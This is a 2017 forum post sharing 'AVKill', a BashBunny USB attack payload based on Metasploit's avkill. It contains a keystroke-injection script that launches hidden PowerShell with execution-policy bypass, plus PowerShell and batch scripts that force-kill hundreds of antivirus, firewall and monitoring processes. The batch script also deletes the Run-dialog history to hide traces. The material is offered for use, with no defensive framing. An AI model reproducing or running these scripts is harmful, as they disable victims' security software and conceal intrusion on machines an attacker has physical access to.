InfoSecREDD
Posted September 19, 2017

Eh, I haven't been too active in a while due to work so I figured I'd post one from my collection.

AVKill - BashBunny

This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny.

Payload.txt

#!/bin/bash
#
# Title:         AVKill
# Author:
# Version:       1.2.1
# Target:        Windows 7-10
#
# O===================O===================
# |      Magenta      |  Setup
# |      Yellow       |  Executing Script
# |   Green/Success   |  Script Completed
# |       Cyan        |  Cleaning Up/
# |         |         |  Shutting down
# |        OFF        |  Ready for Removal
# O=======================================
#
# This is based off of avkill.rb from metasploit framework, I managed to just take the processes out,
# and convert them to both .cmd format AND .ps1 format. So pick your poison guys. Have fun!
#

# Setup BashBunny
LED M SOLID
source bunny_helpers.sh
Q DELAY 5000

# Set BashBunny and Execute AVKill
ATTACKMODE HID STORAGE
LED Y VERYFAST
Q GUI r
Q DELAY 1000
Q STRING powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\start.cmd')"
Q ENTER
LED SUCCESS
Q DELAY 30000

# Starting syncing and shutdown
sync -o
LED C VERYFAST
Q DELAY 3000

# Shutdown Command for BashBunny
LED C SOLID
shutdown 0

AVKill.ps1

Stop-Process -ProcessName AAWTray.exe -Force
Stop-Process -ProcessName Ad-Aware.exe -Force
Stop-Process -ProcessName MSASCui.exe -Force
Stop-Process -ProcessName _avp32.exe -Force
Stop-Process -ProcessName _avpcc.exe -Force
Stop-Process -ProcessName _avpm.exe -Force
Stop-Process -ProcessName aAvgApi.exe -Force
Stop-Process -ProcessName ackwin32.exe -Force
Stop-Process -ProcessName adaware.exe -Force
Stop-Process -ProcessName advxdwin.exe -Force
Stop-Process -ProcessName agentsvr.exe -Force
Stop-Process -ProcessName agentw.exe -Force
Stop-Process -ProcessName alertsvc.exe -Force
Stop-Process -ProcessName alevir.exe -Force
Stop-Process -ProcessName alogserv.exe -Force
Stop-Process -ProcessName amon9x.exe -Force
Stop-Process -ProcessName anti-trojan.exe -Force
Stop-Process -ProcessName antivirus.exe -Force
Stop-Process -ProcessName ants.exe -Force
Stop-Process -ProcessName apimonitor.exe -Force
Stop-Process -ProcessName aplica32.exe -Force
Stop-Process -ProcessName apvxdwin.exe -Force
Stop-Process -ProcessName arr.exe -Force
Stop-Process -ProcessName atcon.exe -Force
Stop-Process -ProcessName atguard.exe -Force
Stop-Process -ProcessName atro55en.exe -Force
Stop-Process -ProcessName atupdater.exe -Force
Stop-Process -ProcessName atwatch.exe -Force
Stop-Process -ProcessName au.exe -Force
Stop-Process -ProcessName aupdate.exe -Force
Stop-Process -ProcessName auto-protect.nav80try.exe -Force
Stop-Process -ProcessName autodown.exe -Force
Stop-Process -ProcessName autotrace.exe -Force
Stop-Process -ProcessName autoupdate.exe -Force
Stop-Process -ProcessName avconsol.exe -Force
Stop-Process -ProcessName ave32.exe -Force
Stop-Process -ProcessName avgcc32.exe -Force
Stop-Process -ProcessName avgctrl.exe -Force
Stop-Process -ProcessName avgemc.exe -Force
Stop-Process -ProcessName avgnt.exe -Force
Stop-Process -ProcessName avgrsx.exe -Force
Stop-Process -ProcessName avgserv.exe -Force
Stop-Process -ProcessName avgserv9.exe -Force
Stop-Process -ProcessName avguard.exe -Force
Stop-Process -ProcessName avgw.exe -Force
Stop-Process -ProcessName avkpop.exe -Force
Stop-Process -ProcessName avkserv.exe -Force
Stop-Process -ProcessName avkservice.exe -Force
Stop-Process -ProcessName avkwctl9.exe -Force
Stop-Process -ProcessName avltmain.exe -Force
Stop-Process -ProcessName avnt.exe -Force
Stop-Process -ProcessName avp.exe -Force
Stop-Process -ProcessName avp.exe -Force
Stop-Process -ProcessName avp32.exe -Force
Stop-Process -ProcessName avpcc.exe -Force
Stop-Process -ProcessName avpdos32.exe -Force
Stop-Process -ProcessName avpm.exe -Force
Stop-Process -ProcessName avptc32.exe -Force
Stop-Process -ProcessName avpupd.exe -Force
Stop-Process -ProcessName avsched32.exe -Force
Stop-Process -ProcessName avsynmgr.exe -Force
Stop-Process -ProcessName avwin.exe -Force
Stop-Process -ProcessName avwin95.exe -Force
Stop-Process -ProcessName avwinnt.exe -Force
Stop-Process -ProcessName avwupd.exe -Force
Stop-Process -ProcessName avwupd32.exe -Force
Stop-Process -ProcessName avwupsrv.exe -Force
Stop-Process -ProcessName avxmonitor9x.exe -Force
Stop-Process -ProcessName avxmonitornt.exe -Force
Stop-Process -ProcessName avxquar.exe -Force
Stop-Process -ProcessName backweb.exe -Force
Stop-Process -ProcessName bargains.exe -Force
Stop-Process -ProcessName bd_professional.exe -Force
Stop-Process -ProcessName beagle.exe -Force
Stop-Process -ProcessName belt.exe -Force
Stop-Process -ProcessName bidef.exe -Force
Stop-Process -ProcessName bidserver.exe -Force
Stop-Process -ProcessName bipcp.exe -Force
Stop-Process -ProcessName bipcpevalsetup.exe -Force
Stop-Process -ProcessName bisp.exe -Force
Stop-Process -ProcessName blackd.exe -Force
Stop-Process -ProcessName blackice.exe -Force
Stop-Process -ProcessName blink.exe -Force
Stop-Process -ProcessName blss.exe -Force
Stop-Process -ProcessName bootconf.exe -Force
Stop-Process -ProcessName bootwarn.exe -Force
Stop-Process -ProcessName borg2.exe -Force
Stop-Process -ProcessName bpc.exe -Force
Stop-Process -ProcessName brasil.exe -Force
Stop-Process -ProcessName bs120.exe -Force
Stop-Process -ProcessName bundle.exe -Force
Stop-Process -ProcessName bvt.exe -Force
Stop-Process -ProcessName ccapp.exe -Force
Stop-Process -ProcessName ccevtmgr.exe -Force
Stop-Process -ProcessName ccpxysvc.exe -Force
Stop-Process -ProcessName cdp.exe -Force
Stop-Process -ProcessName cfd.exe -Force
Stop-Process -ProcessName cfgwiz.exe -Force
Stop-Process -ProcessName cfiadmin.exe -Force
Stop-Process -ProcessName cfiaudit.exe -Force
Stop-Process -ProcessName cfinet.exe -Force
Stop-Process -ProcessName cfinet32.exe -Force
Stop-Process -ProcessName claw95.exe -Force
Stop-Process -ProcessName claw95cf.exe -Force
Stop-Process -ProcessName clean.exe -Force
Stop-Process -ProcessName cleaner.exe -Force
Stop-Process -ProcessName cleaner3.exe -Force
Stop-Process -ProcessName cleanpc.exe -Force
Stop-Process -ProcessName click.exe -Force
Stop-Process -ProcessName cmd.exe -Force
Stop-Process -ProcessName cmd32.exe -Force
Stop-Process -ProcessName cmesys.exe -Force
Stop-Process -ProcessName cmgrdian.exe -Force
Stop-Process -ProcessName cmon016.exe -Force
Stop-Process -ProcessName connectionmonitor.exe -Force
Stop-Process -ProcessName cpd.exe -Force
Stop-Process -ProcessName cpf9x206.exe -Force
Stop-Process -ProcessName cpfnt206.exe -Force
Stop-Process -ProcessName ctrl.exe -Force
Stop-Process -ProcessName cv.exe -Force
Stop-Process -ProcessName cwnb181.exe -Force
Stop-Process -ProcessName cwntdwmo.exe -Force
Stop-Process -ProcessName datemanager.exe -Force
Stop-Process -ProcessName dcomx.exe -Force
Stop-Process -ProcessName defalert.exe -Force
Stop-Process -ProcessName defscangui.exe -Force
Stop-Process -ProcessName defwatch.exe -Force
Stop-Process -ProcessName deputy.exe -Force
Stop-Process -ProcessName divx.exe -Force
Stop-Process -ProcessName dllcache.exe -Force
Stop-Process -ProcessName dllreg.exe -Force
Stop-Process -ProcessName doors.exe -Force
Stop-Process -ProcessName dpf.exe -Force
Stop-Process -ProcessName dpfsetup.exe -Force
Stop-Process -ProcessName dpps2.exe -Force
Stop-Process -ProcessName drwatson.exe -Force
Stop-Process -ProcessName drweb32.exe -Force
Stop-Process -ProcessName drwebupw.exe -Force
Stop-Process -ProcessName dssagent.exe -Force
Stop-Process -ProcessName dvp95.exe -Force
Stop-Process -ProcessName dvp95_0.exe -Force
Stop-Process -ProcessName ecengine.exe -Force
Stop-Process -ProcessName efpeadm.exe -Force
Stop-Process -ProcessName emsw.exe -Force
Stop-Process -ProcessName ent.exe -Force
Stop-Process -ProcessName esafe.exe -Force
Stop-Process -ProcessName escanhnt.exe -Force
Stop-Process -ProcessName escanv95.exe -Force
Stop-Process -ProcessName espwatch.exe -Force
Stop-Process -ProcessName ethereal.exe -Force
Stop-Process -ProcessName etrustcipe.exe -Force
Stop-Process -ProcessName evpn.exe -Force
Stop-Process -ProcessName exantivirus-cnet.exe -Force
Stop-Process -ProcessName exe.avxw.exe -Force
Stop-Process -ProcessName expert.exe -Force
Stop-Process -ProcessName explore.exe -Force
Stop-Process -ProcessName f-agnt95.exe -Force
Stop-Process -ProcessName f-prot.exe -Force
Stop-Process -ProcessName f-prot95.exe -Force
Stop-Process -ProcessName f-stopw.exe -Force
Stop-Process -ProcessName fameh32.exe -Force
Stop-Process -ProcessName fast.exe -Force
Stop-Process -ProcessName fch32.exe -Force
Stop-Process -ProcessName fih32.exe -Force
Stop-Process -ProcessName findviru.exe -Force
Stop-Process -ProcessName firewall.exe -Force
Stop-Process -ProcessName fnrb32.exe -Force
Stop-Process -ProcessName fp-win.exe -Force
Stop-Process -ProcessName fp-win_trial.exe -Force
Stop-Process -ProcessName fprot.exe -Force
Stop-Process -ProcessName frw.exe -Force
Stop-Process -ProcessName fsaa.exe -Force
Stop-Process -ProcessName fsav.exe -Force
Stop-Process -ProcessName fsav32.exe -Force
Stop-Process -ProcessName fsav530stbyb.exe -Force
Stop-Process -ProcessName fsav530wtbyb.exe -Force
Stop-Process -ProcessName fsav95.exe -Force
Stop-Process -ProcessName fsgk32.exe -Force
Stop-Process -ProcessName fsm32.exe -Force
Stop-Process -ProcessName fsma32.exe -Force
Stop-Process -ProcessName fsmb32.exe -Force
Stop-Process -ProcessName gator.exe -Force
Stop-Process -ProcessName gbmenu.exe -Force
Stop-Process -ProcessName gbpoll.exe -Force
Stop-Process -ProcessName generics.exe -Force
Stop-Process -ProcessName gmt.exe -Force
Stop-Process -ProcessName guard.exe -Force
Stop-Process -ProcessName guarddog.exe -Force
Stop-Process -ProcessName hacktracersetup.exe -Force
Stop-Process -ProcessName hbinst.exe -Force
Stop-Process -ProcessName hbsrv.exe -Force
Stop-Process -ProcessName hotactio.exe -Force
Stop-Process -ProcessName hotpatch.exe -Force
Stop-Process -ProcessName htlog.exe -Force
Stop-Process -ProcessName htpatch.exe -Force
Stop-Process -ProcessName hwpe.exe -Force
Stop-Process -ProcessName hxdl.exe -Force
Stop-Process -ProcessName hxiul.exe -Force
Stop-Process -ProcessName iamapp.exe -Force
Stop-Process -ProcessName iamserv.exe -Force
Stop-Process -ProcessName iamstats.exe -Force
Stop-Process -ProcessName ibmasn.exe -Force
Stop-Process -ProcessName ibmavsp.exe -Force
Stop-Process -ProcessName icload95.exe -Force
Stop-Process -ProcessName icloadnt.exe -Force
Stop-Process -ProcessName icmon.exe -Force
Stop-Process -ProcessName icsupp95.exe -Force
Stop-Process -ProcessName icsuppnt.exe -Force
Stop-Process -ProcessName idle.exe -Force
Stop-Process -ProcessName iedll.exe -Force
Stop-Process -ProcessName iedriver.exe -Force
Stop-Process -ProcessName iexplorer.exe -Force
Stop-Process -ProcessName iface.exe -Force
Stop-Process -ProcessName ifw2000.exe -Force
Stop-Process -ProcessName inetlnfo.exe -Force
Stop-Process -ProcessName infus.exe -Force
Stop-Process -ProcessName infwin.exe -Force
Stop-Process -ProcessName init.exe -Force
Stop-Process -ProcessName intdel.exe -Force
Stop-Process -ProcessName intren.exe -Force
Stop-Process -ProcessName iomon98.exe -Force
Stop-Process -ProcessName istsvc.exe -Force
Stop-Process -ProcessName jammer.exe -Force
Stop-Process -ProcessName jdbgmrg.exe -Force
Stop-Process -ProcessName jedi.exe -Force
Stop-Process -ProcessName kavlite40eng.exe -Force
Stop-Process -ProcessName kavpers40eng.exe -Force
Stop-Process -ProcessName kavpf.exe -Force
Stop-Process -ProcessName kazza.exe -Force
Stop-Process -ProcessName keenvalue.exe -Force
Stop-Process -ProcessName kerio-pf-213-en-win.exe -Force
Stop-Process -ProcessName kerio-wrl-421-en-win.exe -Force
Stop-Process -ProcessName kerio-wrp-421-en-win.exe -Force
Stop-Process -ProcessName kernel32.exe -Force
Stop-Process -ProcessName killprocesssetup161.exe -Force
Stop-Process -ProcessName launcher.exe -Force
Stop-Process -ProcessName ldnetmon.exe -Force
Stop-Process -ProcessName ldpro.exe -Force
Stop-Process -ProcessName ldpromenu.exe -Force
Stop-Process -ProcessName ldscan.exe -Force
Stop-Process -ProcessName lnetinfo.exe -Force
Stop-Process -ProcessName loader.exe -Force
Stop-Process -ProcessName localnet.exe -Force
Stop-Process -ProcessName lockdown.exe -Force
Stop-Process -ProcessName lockdown2000.exe -Force
Stop-Process -ProcessName lookout.exe -Force
Stop-Process -ProcessName lordpe.exe -Force
Stop-Process -ProcessName lsetup.exe -Force
Stop-Process -ProcessName luall.exe -Force
Stop-Process -ProcessName luau.exe -Force
Stop-Process -ProcessName lucomserver.exe -Force
Stop-Process -ProcessName luinit.exe -Force
Stop-Process -ProcessName luspt.exe -Force
Stop-Process -ProcessName mapisvc32.exe -Force
Stop-Process -ProcessName mcagent.exe -Force
Stop-Process -ProcessName mcmnhdlr.exe -Force
Stop-Process -ProcessName mcshield.exe -Force
Stop-Process -ProcessName mctool.exe -Force
Stop-Process -ProcessName mcupdate.exe -Force
Stop-Process -ProcessName mcvsrte.exe -Force
Stop-Process -ProcessName mcvsshld.exe -Force
Stop-Process -ProcessName md.exe -Force
Stop-Process -ProcessName mfin32.exe -Force
Stop-Process -ProcessName mfw2en.exe -Force
Stop-Process -ProcessName mfweng3.02d30.exe -Force
Stop-Process -ProcessName mgavrtcl.exe -Force
Stop-Process -ProcessName mgavrte.exe -Force
Stop-Process -ProcessName mghtml.exe -Force
Stop-Process -ProcessName mgui.exe -Force
Stop-Process -ProcessName minilog.exe -Force
Stop-Process -ProcessName mmod.exe -Force
Stop-Process -ProcessName monitor.exe -Force
Stop-Process -ProcessName moolive.exe -Force
Stop-Process -ProcessName mostat.exe -Force
Stop-Process -ProcessName mpfagent.exe -Force
Stop-Process -ProcessName mpfservice.exe -Force
Stop-Process -ProcessName mpftray.exe -Force
Stop-Process -ProcessName mrflux.exe -Force
Stop-Process -ProcessName msapp.exe -Force
Stop-Process -ProcessName msbb.exe -Force
Stop-Process -ProcessName msblast.exe -Force
Stop-Process -ProcessName mscache.exe -Force
Stop-Process -ProcessName msccn32.exe -Force
Stop-Process -ProcessName mscman.exe -Force
Stop-Process -ProcessName msconfig.exe -Force
Stop-Process -ProcessName msdm.exe -Force
Stop-Process -ProcessName msdos.exe -Force
Stop-Process -ProcessName msiexec16.exe -Force
Stop-Process -ProcessName msinfo32.exe -Force
Stop-Process -ProcessName mslaugh.exe -Force
Stop-Process -ProcessName msmgt.exe -Force
Stop-Process -ProcessName msmsgri32.exe -Force
Stop-Process -ProcessName mssmmc32.exe -Force
Stop-Process -ProcessName mssys.exe -Force
Stop-Process -ProcessName msvxd.exe -Force
Stop-Process -ProcessName mu0311ad.exe -Force
Stop-Process -ProcessName mwatch.exe -Force
Stop-Process -ProcessName n32scanw.exe -Force
Stop-Process -ProcessName nav.exe -Force
Stop-Process -ProcessName navap.navapsvc.exe -Force
Stop-Process -ProcessName navapsvc.exe -Force
Stop-Process -ProcessName navapw32.exe -Force
Stop-Process -ProcessName navdx.exe -Force
Stop-Process -ProcessName navlu32.exe -Force
Stop-Process -ProcessName navnt.exe -Force
Stop-Process -ProcessName navstub.exe -Force
Stop-Process -ProcessName navw32.exe -Force
Stop-Process -ProcessName navwnt.exe -Force
Stop-Process -ProcessName nc2000.exe -Force
Stop-Process -ProcessName ncinst4.exe -Force
Stop-Process -ProcessName ndd32.exe -Force
Stop-Process -ProcessName neomonitor.exe -Force
Stop-Process -ProcessName neowatchlog.exe -Force
Stop-Process -ProcessName netarmor.exe -Force
Stop-Process -ProcessName netd32.exe -Force
Stop-Process -ProcessName netinfo.exe -Force
Stop-Process -ProcessName netmon.exe -Force
Stop-Process -ProcessName netscanpro.exe -Force
Stop-Process -ProcessName netspyhunter-1.2.exe -Force
Stop-Process -ProcessName netstat.exe -Force
Stop-Process -ProcessName netutils.exe -Force
Stop-Process -ProcessName nisserv.exe -Force
Stop-Process -ProcessName nisum.exe -Force
Stop-Process -ProcessName nmain.exe -Force
Stop-Process -ProcessName nod32.exe -Force
Stop-Process -ProcessName normist.exe -Force
Stop-Process -ProcessName norton_internet_secu_3.0_407.exe -Force
Stop-Process -ProcessName notstart.exe -Force
Stop-Process -ProcessName npf40_tw_98_nt_me_2k.exe -Force
Stop-Process -ProcessName npfmessenger.exe -Force
Stop-Process -ProcessName nprotect.exe -Force
Stop-Process -ProcessName npscheck.exe -Force
Stop-Process -ProcessName npssvc.exe -Force
Stop-Process -ProcessName nsched32.exe -Force
Stop-Process -ProcessName nssys32.exe -Force
Stop-Process -ProcessName nstask32.exe -Force
Stop-Process -ProcessName nsupdate.exe -Force
Stop-Process -ProcessName nt.exe -Force
Stop-Process -ProcessName ntrtscan.exe -Force
Stop-Process -ProcessName ntvdm.exe -Force
Stop-Process -ProcessName ntxconfig.exe -Force
Stop-Process -ProcessName nui.exe -Force
Stop-Process -ProcessName nupgrade.exe -Force
Stop-Process -ProcessName nvarch16.exe -Force
Stop-Process -ProcessName nvc95.exe -Force
Stop-Process -ProcessName nvsvc32.exe -Force
Stop-Process -ProcessName nwinst4.exe -Force
Stop-Process -ProcessName nwservice.exe -Force
Stop-Process -ProcessName nwtool16.exe -Force
Stop-Process -ProcessName ollydbg.exe -Force
Stop-Process -ProcessName onsrvr.exe -Force
Stop-Process -ProcessName optimize.exe -Force
Stop-Process -ProcessName ostronet.exe -Force
Stop-Process -ProcessName otfix.exe -Force
Stop-Process -ProcessName outpost.exe -Force
Stop-Process -ProcessName outpostinstall.exe -Force
Stop-Process -ProcessName outpostproinstall.exe -Force
Stop-Process -ProcessName padmin.exe -Force
Stop-Process -ProcessName panixk.exe -Force
Stop-Process -ProcessName patch.exe -Force
Stop-Process -ProcessName pavcl.exe -Force
Stop-Process -ProcessName pavproxy.exe -Force
Stop-Process -ProcessName pavsched.exe -Force
Stop-Process -ProcessName pavw.exe -Force
Stop-Process -ProcessName pccwin98.exe -Force
Stop-Process -ProcessName pcfwallicon.exe -Force
Stop-Process -ProcessName pcip10117_0.exe -Force
Stop-Process -ProcessName pcscan.exe -Force
Stop-Process -ProcessName pdsetup.exe -Force
Stop-Process -ProcessName periscope.exe -Force
Stop-Process -ProcessName persfw.exe -Force
Stop-Process -ProcessName perswf.exe -Force
Stop-Process -ProcessName pf2.exe -Force
Stop-Process -ProcessName pfwadmin.exe -Force
Stop-Process -ProcessName pgmonitr.exe -Force
Stop-Process -ProcessName pingscan.exe -Force
Stop-Process -ProcessName platin.exe -Force
Stop-Process -ProcessName pop3trap.exe -Force
Stop-Process -ProcessName poproxy.exe -Force
Stop-Process -ProcessName popscan.exe -Force
Stop-Process -ProcessName portdetective.exe -Force
Stop-Process -ProcessName portmonitor.exe -Force
Stop-Process -ProcessName powerscan.exe -Force
Stop-Process -ProcessName ppinupdt.exe -Force
Stop-Process -ProcessName pptbc.exe -Force
Stop-Process -ProcessName ppvstop.exe -Force
Stop-Process -ProcessName prizesurfer.exe -Force
Stop-Process -ProcessName prmt.exe -Force
Stop-Process -ProcessName prmvr.exe -Force
Stop-Process -ProcessName procdump.exe -Force
Stop-Process -ProcessName processmonitor.exe -Force
Stop-Process -ProcessName procexplorerv1.0.exe -Force
Stop-Process -ProcessName programauditor.exe -Force
Stop-Process -ProcessName proport.exe -Force
Stop-Process -ProcessName protectx.exe -Force
Stop-Process -ProcessName pspf.exe -Force
Stop-Process -ProcessName purge.exe -Force
Stop-Process -ProcessName qconsole.exe -Force
Stop-Process -ProcessName qserver.exe -Force
Stop-Process -ProcessName rapapp.exe -Force
Stop-Process -ProcessName rav7.exe -Force
Stop-Process -ProcessName rav7win.exe -Force
Stop-Process -ProcessName rav8win32eng.exe -Force
Stop-Process -ProcessName ray.exe -Force
Stop-Process -ProcessName rb32.exe -Force
Stop-Process -ProcessName rcsync.exe -Force
Stop-Process -ProcessName realmon.exe -Force
Stop-Process -ProcessName reged.exe -Force
Stop-Process -ProcessName regedit.exe -Force
Stop-Process -ProcessName regedt32.exe -Force
Stop-Process -ProcessName rescue.exe -Force
Stop-Process -ProcessName rescue32.exe -Force
Stop-Process -ProcessName rrguard.exe -Force
Stop-Process -ProcessName rshell.exe -Force
Stop-Process -ProcessName rtvscan.exe -Force
Stop-Process -ProcessName rtvscn95.exe -Force
Stop-Process -ProcessName rulaunch.exe -Force
Stop-Process -ProcessName run32dll.exe -Force
Stop-Process -ProcessName rundll.exe -Force
Stop-Process -ProcessName rundll16.exe -Force
Stop-Process -ProcessName ruxdll32.exe -Force
Stop-Process -ProcessName safeweb.exe -Force
Stop-Process -ProcessName sahagent.exe -Force
Stop-Process -ProcessName save.exe -Force
Stop-Process -ProcessName savenow.exe -Force
Stop-Process -ProcessName sbserv.exe -Force
Stop-Process -ProcessName sc.exe -Force
Stop-Process -ProcessName scam32.exe -Force
Stop-Process -ProcessName scan32.exe -Force
Stop-Process -ProcessName scan95.exe -Force
Stop-Process -ProcessName scanpm.exe -Force
Stop-Process -ProcessName scrscan.exe -Force
Stop-Process -ProcessName serv95.exe -Force
Stop-Process -ProcessName setup_flowprotector_us.exe -Force
Stop-Process -ProcessName setupvameeval.exe -Force
Stop-Process -ProcessName sfc.exe -Force
Stop-Process -ProcessName sgssfw32.exe -Force
Stop-Process -ProcessName sh.exe -Force
Stop-Process -ProcessName shellspyinstall.exe -Force
Stop-Process -ProcessName shn.exe -Force
Stop-Process -ProcessName showbehind.exe -Force
Stop-Process -ProcessName smc.exe -Force
Stop-Process -ProcessName sms.exe -Force
Stop-Process -ProcessName smss32.exe -Force
Stop-Process -ProcessName soap.exe -Force
Stop-Process -ProcessName sofi.exe -Force
Stop-Process -ProcessName sperm.exe -Force
Stop-Process -ProcessName spf.exe -Force
Stop-Process -ProcessName sphinx.exe -Force
Stop-Process -ProcessName spoler.exe -Force
Stop-Process -ProcessName spoolcv.exe -Force
Stop-Process -ProcessName spoolsv32.exe -Force
Stop-Process -ProcessName spyxx.exe -Force
Stop-Process -ProcessName srexe.exe -Force
Stop-Process -ProcessName srng.exe -Force
Stop-Process -ProcessName ss3edit.exe -Force
Stop-Process -ProcessName ssg_4104.exe -Force
Stop-Process -ProcessName ssgrate.exe -Force
Stop-Process -ProcessName st2.exe -Force
Stop-Process -ProcessName start.exe -Force
Stop-Process -ProcessName stcloader.exe -Force
Stop-Process -ProcessName supftrl.exe -Force
Stop-Process -ProcessName support.exe -Force
Stop-Process -ProcessName supporter5.exe -Force
Stop-Process -ProcessName svc.exe -Force
Stop-Process -ProcessName svchostc.exe -Force
Stop-Process -ProcessName svchosts.exe -Force
Stop-Process -ProcessName svshost.exe -Force
Stop-Process -ProcessName sweep95.exe -Force
Stop-Process -ProcessName sweepnet.sweepsrv.sys.swnetsup.exe -Force
Stop-Process -ProcessName symproxysvc.exe -Force
Stop-Process -ProcessName symtray.exe -Force
Stop-Process -ProcessName sysedit.exe -Force
Stop-Process -ProcessName system.exe -Force
Stop-Process -ProcessName system32.exe -Force
Stop-Process -ProcessName sysupd.exe -Force
Stop-Process -ProcessName taskmg.exe -Force
Stop-Process -ProcessName taskmgr.exe -Force
Stop-Process -ProcessName taskmo.exe -Force
Stop-Process -ProcessName taskmon.exe -Force
Stop-Process -ProcessName taumon.exe -Force
Stop-Process -ProcessName tbscan.exe -Force
Stop-Process -ProcessName tc.exe -Force
Stop-Process -ProcessName tca.exe -Force
Stop-Process -ProcessName tcm.exe -Force
Stop-Process -ProcessName tds-3.exe -Force
Stop-Process -ProcessName tds2-98.exe -Force
Stop-Process -ProcessName tds2-nt.exe -Force
Stop-Process -ProcessName teekids.exe -Force
Stop-Process -ProcessName tfak.exe -Force
Stop-Process -ProcessName tfak5.exe -Force
Stop-Process -ProcessName tgbob.exe -Force
Stop-Process -ProcessName titanin.exe -Force
Stop-Process -ProcessName titaninxp.exe -Force
Stop-Process -ProcessName tracert.exe -Force
Stop-Process -ProcessName trickler.exe -Force
Stop-Process -ProcessName trjscan.exe -Force
Stop-Process -ProcessName trjsetup.exe -Force
Stop-Process -ProcessName trojantrap3.exe -Force
Stop-Process -ProcessName tsadbot.exe -Force
Stop-Process -ProcessName tvmd.exe -Force
Stop-Process -ProcessName tvtmd.exe -Force
Stop-Process -ProcessName undoboot.exe -Force
Stop-Process -ProcessName updat.exe -Force
Stop-Process -ProcessName update.exe -Force
Stop-Process -ProcessName upgrad.exe -Force
Stop-Process -ProcessName utpost.exe -Force
Stop-Process -ProcessName vbcmserv.exe -Force
Stop-Process -ProcessName vbcons.exe -Force
Stop-Process -ProcessName vbust.exe -Force
Stop-Process -ProcessName vbwin9x.exe -Force
Stop-Process -ProcessName vbwinntw.exe -Force
Stop-Process -ProcessName vcsetup.exe -Force
Stop-Process -ProcessName vet32.exe -Force
Stop-Process -ProcessName vet95.exe -Force
Stop-Process -ProcessName vettray.exe -Force
Stop-Process -ProcessName vfsetup.exe -Force
Stop-Process -ProcessName vir-help.exe -Force
Stop-Process -ProcessName virusmdpersonalfirewall.exe -Force
Stop-Process -ProcessName vnlan300.exe -Force
Stop-Process -ProcessName vnpc3000.exe -Force
Stop-Process -ProcessName vpc32.exe -Force
Stop-Process -ProcessName vpc42.exe -Force
Stop-Process -ProcessName vpfw30s.exe -Force
Stop-Process -ProcessName vptray.exe -Force
Stop-Process -ProcessName vscan40.exe -Force
Stop-Process -ProcessName vscenu6.02d30.exe -Force
Stop-Process -ProcessName vsched.exe -Force
Stop-Process -ProcessName vsecomr.exe -Force
Stop-Process -ProcessName vshwin32.exe -Force
Stop-Process -ProcessName vsisetup.exe -Force
Stop-Process -ProcessName vsmain.exe -Force
Stop-Process -ProcessName vsmon.exe -Force
Stop-Process -ProcessName vsstat.exe -Force
Stop-Process -ProcessName vswin9xe.exe -Force
Stop-Process -ProcessName vswinntse.exe -Force
Stop-Process -ProcessName vswinperse.exe -Force
Stop-Process -ProcessName w32dsm89.exe -Force
Stop-Process -ProcessName w9x.exe -Force
Stop-Process -ProcessName watchdog.exe -Force
Stop-Process -ProcessName webdav.exe -Force
Stop-Process -ProcessName webscanx.exe -Force
Stop-Process -ProcessName webtrap.exe -Force
Stop-Process -ProcessName wfindv32.exe -Force
Stop-Process -ProcessName whoswatchingme.exe -Force
Stop-Process -ProcessName wimmun32.exe -Force
Stop-Process -ProcessName win-bugsfix.exe -Force
Stop-Process -ProcessName win32.exe -Force
Stop-Process -ProcessName win32us.exe -Force
Stop-Process -ProcessName winactive.exe -Force
Stop-Process -ProcessName window.exe -Force
Stop-Process -ProcessName windows.exe -Force
Stop-Process -ProcessName wininetd.exe -Force
Stop-Process -ProcessName wininitx.exe -Force
Stop-Process -ProcessName winlogin.exe -Force
Stop-Process -ProcessName winmain.exe -Force
Stop-Process -ProcessName winnet.exe -Force
Stop-Process -ProcessName winppr32.exe -Force
Stop-Process -ProcessName winrecon.exe -Force
Stop-Process -ProcessName winservn.exe -Force
Stop-Process -ProcessName winssk32.exe -Force
Stop-Process -ProcessName winstart.exe -Force
Stop-Process -ProcessName winstart001.exe -Force
Stop-Process -ProcessName wintsk32.exe -Force
Stop-Process -ProcessName winupdate.exe -Force
Stop-Process -ProcessName wkufind.exe -Force
Stop-Process -ProcessName wnad.exe -Force
Stop-Process -ProcessName wnt.exe -Force
Stop-Process -ProcessName wradmin.exe -Force
Stop-Process -ProcessName wrctrl.exe -Force
Stop-Process -ProcessName wsbgate.exe -Force
Stop-Process -ProcessName wupdater.exe -Force
Stop-Process -ProcessName wupdt.exe -Force
Stop-Process -ProcessName wyvernworksfirewall.exe -Force
Stop-Process -ProcessName xpf202en.exe -Force
Stop-Process -ProcessName zapro.exe -Force
Stop-Process -ProcessName zapsetup3001.exe -Force
Stop-Process -ProcessName zatutor.exe -Force
Stop-Process -ProcessName zonalm2601.exe -Force
Stop-Process -ProcessName zonealarm.exe -Force

OR

AVKill.cmd

@echo off
cls
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
Taskkill /T /F /IM AAWTray.exe /IM Ad-Aware.exe /IM MSASCui.exe /IM _avp32.exe /IM _avpcc.exe /IM _avpm.exe /IM aAvgApi.exe /IM ackwin32.exe /IM adaware.exe /IM advxdwin.exe
Taskkill /T /F /IM agentsvr.exe /IM agentw.exe /IM alertsvc.exe /IM alevir.exe /IM alogserv.exe /IM amon9x.exe /IM anti-trojan.exe /IM antivirus.exe /IM ants.exe /IM apimonitor.exe
Taskkill /T /F /IM aplica32.exe /IM apvxdwin.exe /IM arr.exe /IM atcon.exe /IM atguard.exe /IM atro55en.exe /IM atupdater.exe /IM atwatch.exe /IM au.exe /IM aupdate.exe
Taskkill /T /F /IM auto-protect.nav80try.exe /IM autodown.exe /IM autotrace.exe /IM autoupdate.exe /IM avconsol.exe /IM ave32.exe /IM avgcc32.exe /IM avgctrl.exe /IM avgemc.exe
Taskkill /T /F /IM avgnt.exe /IM avgrsx.exe /IM avgserv.exe /IM avgserv9.exe /IM avguard.exe /IM avgw.exe /IM avkpop.exe /IM avkserv.exe /IM avkservice.exe /IM avkwctl9.exe
Taskkill /T /F /IM avltmain.exe /IM avnt.exe /IM avp.exe /IM avp.exe /IM avp32.exe /IM avpcc.exe /IM avpdos32.exe /IM avpm.exe /IM avptc32.exe /IM avpupd.exe /IM avsched32.exe
Taskkill /T /F /IM avsynmgr.exe /IM avwin.exe /IM avwin95.exe /IM avwinnt.exe /IM avwupd.exe /IM avwupd32.exe /IM avwupsrv.exe /IM avxmonitor9x.exe /IM avxmonitornt.exe
